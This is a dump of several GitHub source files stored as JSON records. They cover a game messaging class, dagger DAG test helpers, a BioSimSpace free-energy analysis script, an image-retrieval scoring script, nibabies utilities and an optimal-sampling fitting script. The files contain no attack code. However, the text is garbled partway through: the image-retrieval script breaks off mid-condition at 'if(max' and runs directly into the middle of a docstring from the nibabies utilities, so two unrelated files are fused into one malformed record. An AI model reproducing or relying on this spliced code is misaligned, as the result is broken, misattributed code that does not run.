+{"seq_id": "22116118140", "text": "from urllib import parse\nimport json\n\n\nclass Messages:\n def __init__(self, game_type):\n self._game_type = '_' + game_type\n\n def create_request(self, method, game_id, **args):\n request = [('method', method + self._game_type), ('id', str(game_id))]\n for key in args:\n args[key] = str(args[key])\n request.extend(args.items())\n return json.dumps(request)\n\n @staticmethod\n def generate_response(status_code, body_return_value):\n if status_code == 200:\n return_dict = {\"Headers\": {\"Status\": status_code}, \"Payload\": {\"Result\": body_return_value}}\n else:\n return_dict = {\"Headers\": {\"Status\": status_code}, \"Payload\": {\"Error Message\": \"Not found\"}}\n return json.dumps(return_dict)\n\n @staticmethod\n def parse_incoming_request(data):\n \"\"\"\n Parse request parameters\n if this function raises KeyError\n the main server loop closes the connection automatically\n \"\"\"\n data_str = data.decode(encoding='UTF-8')\n request_params_list = json.loads(data_str)\n if request_params_list[0][0] != 'method' or request_params_list[1][0] != 'id':\n raise ValueError('Query string does not include method and id at the beginning')\n method = request_params_list[0][1]\n game_id = request_params_list[1][1]\n optional_params_list = [item[1] for item in request_params_list[2:]]\n return method, game_id, optional_params_list\n\n @staticmethod\n def prepare_response(response):\n \"\"\"\n on failure return empty response to the client\n it would be much better to use HTTP instead of sock library\n and return standard status codes like 200 or 404 to the client\n this function mimics that behavior\n \"\"\"\n if response is None:\n json_ret = Messages.generate_response(404, \"\")\n else:\n json_ret = Messages.generate_response(200, response)\n return json_ret\n\n @staticmethod\n def process_response(data):\n data_dict = json.loads(data)\n if data_dict.get(\"Headers\").get(\"Status\") == 404:\n response = None\n else:\n response = data_dict.get(\"Payload\").get(\"Result\")\n return response\n", "repo_name": "phpl/pite_lab3", "sub_path": "game/common/messages.py", "file_name": "messages.py", "file_ext": "py", "file_size_in_byte": 2291, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "json.dumps", "line_number": 14, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 22, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 32, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 56, "usage_type": "call"}]}
+{"seq_id": "27918337848", "text": "\"\"\"Verify examples work with the provided runtimes.\"\"\"\n\nfrom pathlib import Path\nfrom typing import Any, Callable, Mapping\n\nimport yaml\nfrom deepdiff import DeepDiff\n\nfrom dagger import DAG\n\n\ndef verify_dag_works_with_all_runtimes(\n dag: DAG,\n params: Mapping[str, bytes],\n validate_results: Callable[[Mapping[str, bytes]], None],\n argo_workflow_yaml_filename: str,\n):\n \"\"\"\n Run/Compile the DAG using all available runtimes and verifies its behavior or expectations.\n\n Parameters\n ----------\n dag\n The DAG to test\n\n params\n A mapping of parameter names to values\n\n validate_results\n A function validating the outputs of the DAG\n\n argo_workflow_yaml_filename\n The filename of the YAML manifest we expect the Argo runtime to produce\n \"\"\"\n verify_dag_works_with_local_runtime(\n dag,\n params=params,\n validate_results=validate_results,\n )\n verify_dag_works_with_cli_runtime(\n dag,\n params=params,\n validate_results=validate_results,\n )\n verify_dag_matches_expected_manifest_when_using_argo_runtime(\n dag,\n params=params,\n expected_manifest=_load_argo_manifest(argo_workflow_yaml_filename),\n )\n\n\ndef verify_dag_works_with_local_runtime(\n dag: DAG,\n params: Mapping[str, Any],\n validate_results: Callable[[Mapping[str, bytes]], None],\n):\n \"\"\"\n Run the DAG using the local runtime, and calls the supplied function to validate the results.\n\n Parameters\n ----------\n dag\n The DAG to test\n\n params\n A mapping of parameter names to values\n\n validate_results\n A function validating the outputs of the DAG\n \"\"\"\n from dagger.runtime.local import invoke\n\n results = invoke(dag, params=params)\n validate_results(results)\n\n\ndef verify_dag_works_with_cli_runtime(\n dag: DAG,\n params: Mapping[str, Any],\n validate_results: Callable[[Mapping[str, bytes]], None],\n):\n \"\"\"\n Run the DAG using the CLI runtime, and calls the supplied function to validate the results.\n\n Parameters\n ----------\n dag\n The DAG to test\n\n params\n A mapping of parameter names to values\n\n validate_results\n A function validating the outputs of the DAG\n \"\"\"\n import itertools\n import os\n import tempfile\n\n from dagger.runtime.cli import invoke\n\n with tempfile.TemporaryDirectory() as tmp:\n\n for param_name, param_value in params.items():\n with open(os.path.join(tmp, param_name), \"wb\") as f:\n serializer = dag.inputs[param_name].serializer\n serializer.serialize(param_value, f)\n\n invoke(\n dag,\n argv=itertools.chain(\n *[\n [\"--input\", param_name, os.path.join(tmp, param_name)]\n for param_name in params\n ],\n *[\n [\"--output\", output_name, os.path.join(tmp, output_name)]\n for output_name in dag.outputs\n ],\n ),\n )\n\n results = {}\n for output_name, output_type in dag.outputs.items():\n with open(os.path.join(tmp, output_name), \"rb\") as f:\n results[output_name] = output_type.serializer.deserialize(f)\n\n validate_results(results)\n\n\ndef verify_dag_matches_expected_manifest_when_using_argo_runtime(\n dag: DAG,\n params: Mapping[str, bytes],\n expected_manifest: dict,\n):\n \"\"\"\n Compile the DAG into Argo CRD manifests using the Argo runtime, and validates the results against a pre-compiled version that has been tested previously.\n\n Parameters\n ----------\n dag\n The DAG to test\n\n params\n A mapping of parameter names to values\n\n expected_manifest\n An Argo CRD representing a workflow that runs the supplied DAG.\n We only check the 'spec' section of the workflow. 
Therefore, metadata, API versioning or scheduling options do not have any effect on the result of calling this function.\n \"\"\"\n import dagger.runtime.argo as argo\n\n try:\n container_entrypoint = [\n template[\"container\"].get(\"command\", [])\n for template in expected_manifest[\"spec\"][\"templates\"]\n if \"container\" in template\n ][0]\n except KeyError:\n raise ValueError(\n \"The argo manifest you pointed to does not contain any template that uses a container. We expect DAGs to have, at least, one task, and the task to be executed through a container. There may be a mistake with the file you created. Please check other examples for reference.\"\n )\n\n generated_manifest = argo.workflow_manifest(\n dag,\n metadata=argo.Metadata(name=\"some-name\"),\n workflow=argo.Workflow(\n params=params,\n container_image=\"local.registry/dagger\",\n container_entrypoint_to_dag_cli=container_entrypoint,\n ),\n )\n\n diff = DeepDiff(\n expected_manifest[\"spec\"],\n generated_manifest[\"spec\"],\n ignore_order=True,\n view=\"tree\",\n )\n\n print(f\"Generated manifest is:\\n{yaml.dump(generated_manifest)}\")\n print(diff.pretty())\n assert not diff\n\n\ndef _load_argo_manifest(filename: str):\n path = Path(__file__).parent / \"argo\" / filename\n with open(path, \"r\") as f:\n return yaml.safe_load(f)\n", "repo_name": "larribas/dagger", "sub_path": "tests/examples/verification.py", "file_name": "verification.py", "file_ext": "py", "file_size_in_byte": 5381, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 12, "dataset": "github-code", "pt": "32", "api": [{"api_name": "dagger.DAG", "line_number": 13, "usage_type": "name"}, {"api_name": "typing.Mapping", "line_number": 14, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 15, "usage_type": "name"}, {"api_name": "typing.Mapping", "line_number": 15, "usage_type": "name"}, {"api_name": "dagger.DAG", "line_number": 53, "usage_type": "name"}, {"api_name": "typing.Mapping", "line_number": 54, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 54, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 55, "usage_type": "name"}, {"api_name": "typing.Mapping", "line_number": 55, "usage_type": "name"}, {"api_name": "dagger.runtime.local.invoke", "line_number": 73, "usage_type": "call"}, {"api_name": "dagger.DAG", "line_number": 78, "usage_type": "name"}, {"api_name": "typing.Mapping", "line_number": 79, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 79, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 80, "usage_type": "name"}, {"api_name": "typing.Mapping", "line_number": 80, "usage_type": "name"}, {"api_name": "tempfile.TemporaryDirectory", "line_number": 102, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 105, "usage_type": "call"}, {"api_name": "os.path", "line_number": 105, "usage_type": "attribute"}, {"api_name": "dagger.runtime.cli.invoke", "line_number": 109, "usage_type": "call"}, {"api_name": "itertools.chain", "line_number": 111, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 113, "usage_type": "call"}, {"api_name": "os.path", "line_number": 113, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 117, "usage_type": "call"}, {"api_name": "os.path", "line_number": 117, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 125, "usage_type": "call"}, {"api_name": "os.path", "line_number": 125, "usage_type": "attribute"}, {"api_name": "dagger.DAG", "line_number": 
132, "usage_type": "name"}, {"api_name": "typing.Mapping", "line_number": 133, "usage_type": "name"}, {"api_name": "dagger.runtime.argo.workflow_manifest", "line_number": 164, "usage_type": "call"}, {"api_name": "dagger.runtime.argo", "line_number": 164, "usage_type": "name"}, {"api_name": "dagger.runtime.argo.Metadata", "line_number": 166, "usage_type": "call"}, {"api_name": "dagger.runtime.argo", "line_number": 166, "usage_type": "name"}, {"api_name": "dagger.runtime.argo.Workflow", "line_number": 167, "usage_type": "call"}, {"api_name": "dagger.runtime.argo", "line_number": 167, "usage_type": "name"}, {"api_name": "deepdiff.DeepDiff", "line_number": 174, "usage_type": "call"}, {"api_name": "yaml.dump", "line_number": 181, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 187, "usage_type": "call"}, {"api_name": "yaml.safe_load", "line_number": 189, "usage_type": "call"}]}
+{"seq_id": "28630348656", "text": "import BioSimSpace as BSS\nfrom BioSimSpace import _Exceptions\nimport sys\nimport csv\nimport os\nimport numpy as np\n\nimport matplotlib as mpl\nmpl.use('Agg')\nimport matplotlib.pyplot as plt\nfrom matplotlib import colors\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nprint (\"%s %s %s %s\" % (sys.argv[0], sys.argv[1], sys.argv[2], sys.argv[3]))\nresults_file_path = \"./outputs/summary.csv\"\n\ndef plotOverlapMatrix(overlap_matrix, savepath):\n\t\"\"\"\n\tGiven a SOMD-style overlap numpy matrix, plot heatmap in best practices style.\n\n\t--args\n\toverlap matrix (array): numpy 2D array of (n,n)\n\n\t--returns\n None; saves plot instead.\n\t\"\"\"\n\n\n\tovlp_mtx = overlap_matrix\n\n\tcmap = colors.ListedColormap(['#FBE8EB','#88CCEE','#78C592', '#117733'])\n\tbounds=[0.0, 0.025, 0.1, 0.3,0.8]\n\tnorm = colors.BoundaryNorm(bounds, cmap.N, clip=False)\n\tcbar_kws=dict(ticks=[.025, .1, .3,0.8], label='Phase space overlap')\n\tax = sns.heatmap(ovlp_mtx,annot=False, fmt='.2f', linewidths=.3,\n\t annot_kws={\"size\": 14},square=True,robust=True,cmap=cmap,\n\t norm=norm,cbar_kws=cbar_kws)\n\tax.xaxis.tick_top()\n\n\tplt.savefig(savepath, dpi=200)\n\n# simply load the FEP directory of the corresponding ligand using BSS.\n# this function computes the binding free energy as well.\n\n#print (sys.argv)\nengine = sys.argv[3].rstrip()\n#print (\"@%s@\" % sys.argv[1])\n#print (\"@%s@\" % sys.argv[2])\n#print (\"@%s@\" % engine)\n\npath_to_dir = f\"./outputs/{engine}/{sys.argv[1]}~{sys.argv[2]}\"\nprint (path_to_dir)\n#path_to_dir = \"./outputs/%s/%s~%s\" % (engine, sys.argv[1], sys.argv[2])\n#print (path_to_dir)\nfreenrg_val = \"NaN\"\nfreenrg_err = \"NaN\"\ntry:\n pmf_bound, overlap_matrix_bound = BSS.FreeEnergy.Relative.analyse(path_to_dir+\"/bound\")\n pmf_free, overlap_matrix_free = BSS.FreeEnergy.Relative.analyse(path_to_dir+\"/free\")\n\n freenrg = BSS.FreeEnergy.Relative.difference(pmf_bound, pmf_free)\n freenrg_val = round(freenrg[0].value(), 4)\n freenrg_err = round(freenrg[1].value(), 4)\n\nexcept _Exceptions.AnalysisError:\n freenrg_val = freenrg_err = \"NaN\"\n overlap_matrix_bound = overlap_matrix_free = None\n\n\ndata_point = [sys.argv[1], sys.argv[2], str(freenrg_val), str(freenrg_err), engine]\n\n####### WRITING DATA\n\n# use csv to open the results file.\nwith open(results_file_path, \"a\") as freenrg_writefile:\n writer = csv.writer(freenrg_writefile)\n \n # first, write a header if the file is created for the first time.\n if os.path.getsize(results_file_path) == 0:\n print(f\"Starting {results_file_path} file.\")\n writer.writerow([\"lig_1\", \"lig_2\", \"freenrg\", \"error\", \"engine\"])\n\n \nwith open(results_file_path, \"r\") as freenrg_readfile:\n # then, grab all of the data that is already in the file.\n reader = csv.reader(freenrg_readfile)\n data_entries = [ row for row in reader ]\n\n# check if our data entry is not already in the results file. Raise an error if is.\nif data_point in data_entries:\n raise Exception(f\"Results for this run are already in {results_file_path}. Exiting.\")\n\n# at this point we know that we are writing a new entry in the results file. Append the line to the file.\n# use csv to open the results file.\nwith open(results_file_path, \"a\") as freenrg_writefile:\n writer = csv.writer(freenrg_writefile)\n\n print(\"Writing MBAR results. 
Free energy of binding and error are (rsp.):\")\n print(freenrg)\n writer.writerow(data_point)\n\n\n# in case of SOMD, we will also have overlap matrices for both legs. These are helpful for troubleshooting, so store \n# them in ./logs/\nif overlap_matrix_bound:\n np.save(f\"logs/overlap_bound_{sys.argv[1]}~{sys.argv[2]}\", np.matrix(overlap_matrix_bound))\n plotOverlapMatrix(np.matrix(overlap_matrix_bound), f\"logs/overlap_bound_{sys.argv[1]}~{sys.argv[2]}.png\")\nelse:\n print(\"Failed to write overlap matrix for bound leg.\")\nif overlap_matrix_free:\n np.save(f\"logs/overlap_free_{sys.argv[1]}~{sys.argv[2]}\", np.matrix(overlap_matrix_free))\n plotOverlapMatrix(np.matrix(overlap_matrix_free), f\"logs/overlap_free_{sys.argv[1]}~{sys.argv[2]}.png\")\nelse:\n print(\"Failed to write overlap matrix for free leg.\")\n", "repo_name": "michellab/BioSimSpaceTutorials", "sub_path": "04_fep/fep_archiv/execution_model/scripts/BSSanalyseFEP.py", "file_name": "BSSanalyseFEP.py", "file_ext": "py", "file_size_in_byte": 4115, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 25, "dataset": "github-code", "pt": "32", "api": [{"api_name": "matplotlib.use", "line_number": 9, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 15, "usage_type": "attribute"}, {"api_name": "matplotlib.colors.ListedColormap", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.colors", "line_number": 32, "usage_type": "name"}, {"api_name": "matplotlib.colors.BoundaryNorm", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.colors", "line_number": 34, "usage_type": "name"}, {"api_name": "seaborn.heatmap", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 47, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 52, "usage_type": "attribute"}, {"api_name": "BioSimSpace.FreeEnergy.Relative.analyse", "line_number": 59, "usage_type": "call"}, {"api_name": "BioSimSpace.FreeEnergy", "line_number": 59, "usage_type": "attribute"}, {"api_name": "BioSimSpace.FreeEnergy.Relative.analyse", "line_number": 60, "usage_type": "call"}, {"api_name": "BioSimSpace.FreeEnergy", "line_number": 60, "usage_type": "attribute"}, {"api_name": "BioSimSpace.FreeEnergy.Relative.difference", "line_number": 62, "usage_type": "call"}, {"api_name": "BioSimSpace.FreeEnergy", "line_number": 62, "usage_type": "attribute"}, {"api_name": "BioSimSpace._Exceptions.AnalysisError", "line_number": 66, "usage_type": "attribute"}, {"api_name": "BioSimSpace._Exceptions", "line_number": 66, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 71, "usage_type": "attribute"}, {"api_name": "csv.writer", "line_number": 77, "usage_type": "call"}, {"api_name": "os.path.getsize", "line_number": 80, "usage_type": "call"}, {"api_name": "os.path", "line_number": 80, "usage_type": "attribute"}, {"api_name": "csv.reader", "line_number": 87, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 107, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 107, "usage_type": "attribute"}, {"api_name": "numpy.matrix", "line_number": 107, "usage_type": "call"}, {"api_name": "numpy.matrix", "line_number": 108, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 108, "usage_type": "attribute"}, {"api_name": "numpy.save", 
"line_number": 112, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 112, "usage_type": "attribute"}, {"api_name": "numpy.matrix", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.matrix", "line_number": 113, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 113, "usage_type": "attribute"}]}
+{"seq_id": "42894412592", "text": "# -*- coding: utf-8 -*-\n\nimport os\nimport numpy as np\nimport h5py\nfrom sklearn.decomposition import PCA\nfrom sklearn import preprocessing\n\n#参数配置\nfeaturename1=\"../gem_res_holiday_1.h5\"\nfeaturename2=\"../gem_res_holiday_2.h5\"\nfeaturename3=\"../gem_res_holiday_3.h5\"\n\n\nquerySize=500\ndatasetSize=1491 #原始数据库大小\n\ndef postProcess(feats):\n # 在这里正则\n # l2norm之前已经进行了一次\n # pca\n pca = PCA(n_components=8, svd_solver='auto', whiten=True)\n # 使用oxford来训练\n h5f = h5py.File(\"../gem_res_ox_3.h5\", 'r')\n feat_train = h5f['dataset_1'][:]\n pca.fit_transform(feat_train)\n feats = pca.transform(feats)\n # h5f.close()\n # l2renorm\n feats=preprocessing.normalize(feats, norm='l2')\n return feats\n# 实现得到数据库的vector\nh5f1 = h5py.File(featurename1, 'r')\nh5f2 = h5py.File(featurename2, 'r')\nh5f3 = h5py.File(featurename3, 'r')\n\nfeats1 = h5f1['dataset_1'][:]\nfeats2 = h5f2['dataset_1'][:]\nfeats3 = h5f3['dataset_1'][:]\n\n# print(\"---------feats1---------\")\n# print(feats1.shape)\n# print(\"---------feats2---------\")\n# print(feats2)\n# print(\"---------feats3---------\")\n# print(feats3)\n\n\n\n\n# 进行后处理\nfeats1 = postProcess(feats1)\nfeats2 = postProcess(feats2)\nfeats3 = postProcess(feats3)\n\n\n# 这里是带后缀的裁剪图片\nimgNames1 = h5f1['dataset_2'][:]\nimgNames2 = h5f2['dataset_2'][:]\nimgNames3 = h5f3['dataset_2'][:]\n\n\nh5f1.close()\nh5f2.close()\nh5f3.close()\n\ndef getLayerImgNames(L):\n if L==1:\n return imgNames1\n elif L==2:\n return imgNames2\n elif L==3:\n return imgNames3\n\ndef getLayerFeats(L):\n if L==1:\n return feats1\n elif L==2:\n return feats2\n elif L==3:\n return feats3\n\ndef getResult(query,feats,imgNames):\n #不用输入模型重复计算\n queryVec=feats[imgNames.tolist().index(np.string_(query))]\n scores = np.dot(queryVec, feats.T)\n\n\n rank_ID = np.argsort(scores)[::-1]\n rank_score = scores[rank_ID]\n # number of top retrieved images to show\n maxres = datasetSize\n imlist = [imgNames[index].decode() for i, index in enumerate(rank_ID[0:maxres])]\n print(\"top %d images in order are: \" % maxres, imlist[0:10])\n return imlist\n\ndef getImageScore(Lr,Lq,query):\n subScores=[]\n for i in range(1,Lq+1):\n if i==1:\n npfinalScore=getsubqueryScore(Lr, query, getLayerFeats(i), getLayerImgNames(i))\n for item in range(datasetSize):\n npfinalScore[item]=npfinalScore[item]*Lr\n subScores.append(npfinalScore)\n continue\n img_name = os.path.splitext(query)[0]\n for j in range(i):\n for k in range(i):\n subPatchName = img_name + \"_\" + str(j) + str(k) + \".jpg\"\n npfinalScore=getsubqueryScore(Lr, subPatchName, getLayerFeats(i), getLayerImgNames(i))\n for item in range(datasetSize):\n #改变子块权重\n npfinalScore[item] = npfinalScore[item]\n subScores.append(npfinalScore)\n finalScore=[0.0,]*datasetSize\n for i in range(datasetSize):\n for j in range(len(subScores)):\n #相加\n finalScore[i]+=subScores[j][i]\n finalScore[i]=finalScore[i]#/len(subScores)\n return np.array(finalScore)\n# 得到query图片的当前子块分数向量\ndef getsubqueryScore(Lr,subquery,qfeats,qimgNames):\n finalScore = []\n layerScores = []\n i = Lr\n while i > 0:\n totalSubOfLayer = i * i\n # 计算每个查询图的最小feature分数\n queryVec = qfeats[qimgNames.tolist().index(np.string_(subquery))]\n scores = np.dot(queryVec, getLayerFeats(i).T)\n\n max = float('-inf') # 未做归一化,值的范围要这样设置\n #重设分数\n score = []\n for k in range(len(scores)):\n # 得到当前layer块中的最相似的子块\n if (max < scores[k]):\n max = scores[k]\n if ((k + 1) % totalSubOfLayer == 0):\n score.append(max)\n max = float('-inf')\n i = i - 1\n #加入每层的最终分数\n layerScores.append(score)\n 
#根据每层的分数得到查询图片的最终分数\n for j in range(datasetSize):\n max = float('-inf')\n for i in range(Lr):\n if(max>> fix_multi_source_name([\n ... '/path/to/sub-045_ses-test_T1w.nii.gz',\n ... '/path/to/sub-045_ses-retest_T1w.nii.gz'])\n '/path/to/sub-045_T1w.nii.gz'\n \"\"\"\n import re\n\n from nipype.utils.filemanip import filename_to_list\n\n if not isinstance(in_files, (tuple, list)):\n return in_files\n elif len(in_files) == 1:\n return in_files[0]\n\n p = Path(filename_to_list(in_files)[0])\n # subject_label = p.name.split(\"_\", 1)[0].split(\"-\")[1]\n try:\n subj = re.search(r\"(?<=^sub-)[a-zA-Z0-9]*\", p.name).group()\n suffix = re.search(r\"(?<=_)\\w+(?=\\.)\", p.name).group()\n except AttributeError:\n raise AttributeError(\"Could not extract BIDS information\")\n return str(p.parent / f\"sub-{subj}_{suffix}.nii.gz\")\n\n\ndef check_deps(workflow):\n \"\"\"Make sure dependencies are present in this system.\"\"\"\n from nipype.utils.filemanip import which\n\n return sorted(\n (node.interface.__class__.__name__, node.interface._cmd)\n for node in workflow._get_all_nodes()\n if (hasattr(node.interface, \"_cmd\") and which(node.interface._cmd.split()[0]) is None)\n )\n\n\ndef cohort_by_months(template, months):\n \"\"\"\n Produce a recommended cohort based on partipants age\n \"\"\"\n cohort_key = {\n \"MNIInfant\": (\n # upper bound of template | cohort\n 2, # 1\n 5, # 2\n 8, # 3\n 11, # 4\n 14, # 5\n 17, # 6\n 21, # 7\n 27, # 8\n 33, # 9\n 44, # 10\n 60, # 11\n ),\n \"UNCInfant\": (\n 8, # 1\n 12, # 2\n 24, # 3\n ),\n }\n ages = cohort_key.get(template)\n if ages is None:\n raise KeyError(\"Template cohort information does not exist.\")\n\n for cohort, age in enumerate(ages, 1):\n if months <= age:\n return cohort\n raise KeyError(\"Age exceeds all cohorts!\")\n\n\ndef check_total_memory(recommended_gb):\n \"\"\"\n Check total memory allocated to the process, and compare with a recommended value.\n If available memory is equal to or greater than recommended, return ``True``.\n Otherwise, return ``False``.\n \"\"\"\n\n try:\n import psutil\n except ImportError:\n return\n\n tot = int(psutil.virtual_memory().total / 1024**3)\n return tot >= recommended_gb\n\n\ndef combine_meepi_source(in_files):\n \"\"\"\n Create a new source name when optimally\n combining multiple multi-echo EPIs\n >>> combine_meepi_source([\n ... 'sub-01_run-01_echo-1_bold.nii.gz',\n ... 'sub-01_run-01_echo-2_bold.nii.gz',\n ... 
'sub-01_run-01_echo-3_bold.nii.gz',])\n 'sub-01_run-01_bold.nii.gz'\n \"\"\"\n import os\n\n from nipype.utils.filemanip import filename_to_list\n\n base, in_file = os.path.split(filename_to_list(in_files)[0])\n entities = [ent for ent in in_file.split(\"_\") if not ent.startswith(\"echo-\")]\n basename = \"_\".join(entities)\n return os.path.join(base, basename)\n\n\ndef get_file(pkg: str, src_path: Union[str, Path]) -> str:\n \"\"\"\n Get or extract a source file.\n Assures the file will be available until the lifetime of the current Python process.\n \"\"\"\n import atexit\n from contextlib import ExitStack\n\n try:\n from importlib.resources import as_file, files\n except ImportError:\n from importlib_resources import as_file, files\n\n file_manager = ExitStack()\n atexit.register(file_manager.close)\n ref = files(pkg) / str(src_path)\n fl = file_manager.enter_context(as_file(ref))\n return str(fl)\n", "repo_name": "nipreps/nibabies", "sub_path": "nibabies/utils/misc.py", "file_name": "misc.py", "file_ext": "py", "file_size_in_byte": 3925, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 18, "dataset": "github-code", "pt": "32", "api": [{"api_name": "pathlib.Path", "line_number": 28, "usage_type": "call"}, {"api_name": "nipype.utils.filemanip.filename_to_list", "line_number": 28, "usage_type": "call"}, {"api_name": "re.search", "line_number": 31, "usage_type": "call"}, {"api_name": "re.search", "line_number": 32, "usage_type": "call"}, {"api_name": "nipype.utils.filemanip.which", "line_number": 45, "usage_type": "call"}, {"api_name": "psutil.virtual_memory", "line_number": 96, "usage_type": "call"}, {"api_name": "os.path.split", "line_number": 114, "usage_type": "call"}, {"api_name": "os.path", "line_number": 114, "usage_type": "attribute"}, {"api_name": "nipype.utils.filemanip.filename_to_list", "line_number": 114, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 117, "usage_type": "call"}, {"api_name": "os.path", "line_number": 117, "usage_type": "attribute"}, {"api_name": "typing.Union", "line_number": 120, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 120, "usage_type": "name"}, {"api_name": "contextlib.ExitStack", "line_number": 133, "usage_type": "call"}, {"api_name": "atexit.register", "line_number": 134, "usage_type": "call"}, {"api_name": "importlib_resources.files", "line_number": 135, "usage_type": "call"}, {"api_name": "importlib_resources.as_file", "line_number": 136, "usage_type": "call"}]}
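cohort_by_months in the record above is a linear scan over inclusive age upper bounds. The same lookup can be written with the standard library's bisect; a sketch checked against the record's MNIInfant thresholds:

from bisect import bisect_left

def cohort_by_months_bisect(ages, months):
    idx = bisect_left(ages, months)  # upper bounds are inclusive, so bisect_left
    if idx == len(ages):
        raise KeyError("Age exceeds all cohorts!")
    return idx + 1  # cohorts are 1-indexed

mni_infant = (2, 5, 8, 11, 14, 17, 21, 27, 33, 44, 60)
assert cohort_by_months_bisect(mni_infant, 10) == 4  # matches the scan above
assert cohort_by_months_bisect(mni_infant, 5) == 2   # boundary months included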
+{"seq_id": "32125616294", "text": "import numpy as np\r\nfrom scipy.special import factorial\r\nimport optimalSampling\r\nfrom matplotlib import pyplot as plt\r\n\r\nclass fvesFunction():\r\n\r\n def poissonfunction(self, x, x_average):\r\n return (x_average ** x * np.exp(-x_average)) / factorial(x)\r\n\r\n def getFunction(self, xn, beta):\r\n\r\n laccessible = xn\r\n\r\n kp = beta[0]\r\n\r\n W = 55.5 # water concentration\r\n NAvogadro = 6.022E23\r\n\r\n # fixed parmeters (can be input as beta parameters)\r\n # freeprobe = beta[1]\r\n # ptotal = beta[2]\r\n # vtotal = beta[3]\r\n # mu = beta[4]\r\n\r\n ximax = 1\r\n freeprobe = 0.02\r\n q = 1.3\r\n ptotal = 2.5e-8 # in M\r\n vtotal = 1.5e-4 # in L\r\n mu = 125000\r\n\r\n LTotal = 2 * laccessible\r\n\r\n xm = (kp * laccessible * ximax) / (W + kp * laccessible)\r\n try:\r\n k_average = xm * ptotal * mu / LTotal\r\n # print(k_average)\r\n except:\r\n print('Tengo un problema')\r\n\r\n nvestotal = LTotal * vtotal * NAvogadro / mu\r\n nprottotal = ptotal * vtotal * NAvogadro\r\n\r\n nprotfree = nprottotal * (1 - xm)\r\n\r\n max_bind = 100\r\n k = np.linspace(1,max_bind, max_bind)\r\n\r\n sump = np.sum(k ** 2 * self.poissonfunction(k, np.asarray(k_average)))\r\n\r\n ndye = freeprobe * nprottotal\r\n fves = sump * nvestotal / (ndye * q ** 2 + nprotfree + sump * nvestotal)\r\n return fves\r\n\r\n\r\nclass FVesFunction(optimalSampling.FittingFunctionLS):\r\n # Melo2011 function application\r\n def getFunction(self, xn, beta):\r\n return fvesFunction().getFunction(xn, beta)\r\n\r\n def postProcess(self, y):\r\n return np.clip(y,0.0,None)\r\n\r\n def getTrueSigma2(self, xn, beta):\r\n y=np.abs(self.getFunction(xn,beta))\r\n return self.sigma2*y*y\r\n\r\n def getWeight(self, xn, beta):\r\n y=np.abs(self.getFunction(xn,beta))\r\n return 1/y\r\n\r\n def getBetaStep1(self, i):\r\n return 1e2\r\n\r\n def getBetaStep1(self, j):\r\n return 1e2\r\n\r\n\r\nh=FVesFunction()\r\nh.sigma2=0.01\r\ntrueBeta=np.asarray([[5e5]])\r\n\r\n# I put 10 sampling points to properly follow the function as an example\r\n\r\nX=np.asarray([[1e-7], [5e-7], [1e-6], [1e-5], [5e-5],[1e-4], [5e-4], [1e-3], [5e-3], [1e-2], [5e-2]])\r\ny=h.simulateFunctionAtMultiplePoints(X, trueBeta, True)\r\n\r\nevaluator=optimalSampling.FIMEvaluator(optimalSampling.CramerRaoBound)\r\n\r\nstepx = 0.1\r\nbeta0 = np.asarray([[1e5]])\r\nN = 10\r\n\r\ngrid = np.exp(np.mgrid[-7:-2+stepx:stepx]) # x sampling in this function has to be logarithmic\r\noptimalSampling.simulateProcess(h,trueBeta,X,y,beta0,N,grid,evaluator, verbose=True, logxscale=True)", "repo_name": "cossorzano/optimalSampling", "sub_path": "optimalBatch6.py", "file_name": "optimalBatch6.py", "file_ext": "py", "file_size_in_byte": 2673, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "numpy.exp", "line_number": 9, "usage_type": "call"}, {"api_name": "scipy.special.factorial", "line_number": 9, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 50, "usage_type": "call"}, {"api_name": "optimalSampling.FittingFunctionLS", "line_number": 57, "usage_type": "attribute"}, {"api_name": "numpy.clip", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.asarray", 
